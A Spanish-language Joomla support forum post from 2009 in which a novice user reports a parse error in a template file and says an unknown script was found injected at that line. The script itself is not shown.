Foros Joomla! Spanish

Zona técnica, debate y cooperación sobre Joomla!

Zonas Joomla! Spanish

Portal Joomla! Spansih
Portal Joomla! Spansih NoticiasComunidad JSZona de Extensiones

Estar informado de J!S

Boletines JS
Sigue el proyecto desde joomlacode
Joomla! Spanish 1.5.26 liberada

Sigue el proyecto desde joomlacode de la 3.0
Joomla! Spanish 3.1.0 liberada

Sigue el proyecto desde joomlacode de la 2.5
Joomla! Spanish 2.5.11 Liberada

Estadistícas del foro

• Miembros en el foro: 386,326
  • Total Temas: 74,038
  • Total Mensajes: 9
Hay 171 usuarios actualmente navegando en los foros.

Colaboradores Gold

Soporte Publicitario

Responder
Antiguo 04-12-2009, 05:11 PM   #1
Iniciado en Joomla

b0la0 is on a distinguished road
Predeterminado Virus en Joomla Urgente

Hola a todos, soy novato en el tema de Joomla y necesito su ayuda urgente, tengo el siguiente problema, desarrolle una web en la ultima version de Joomla y todo funcionaba ok, hasta que de pronto, luego de acutalizar mi sitio, en cuanto a contenidos y algunos productos del virtuemart. al otro dia al entra al sitio me daba el siguiente error:

Parse error: syntax error, unexpected '<' in /home/mihost/template/index.php on line 90

Por ende no me cargaba el sitio y solo se veia el texto anterior.
Me puse a revisar el codigo de mi index.php en la linea 90 como indicaba el error, cuando me encuentro con el siguiente Scrip instalado en el codigo..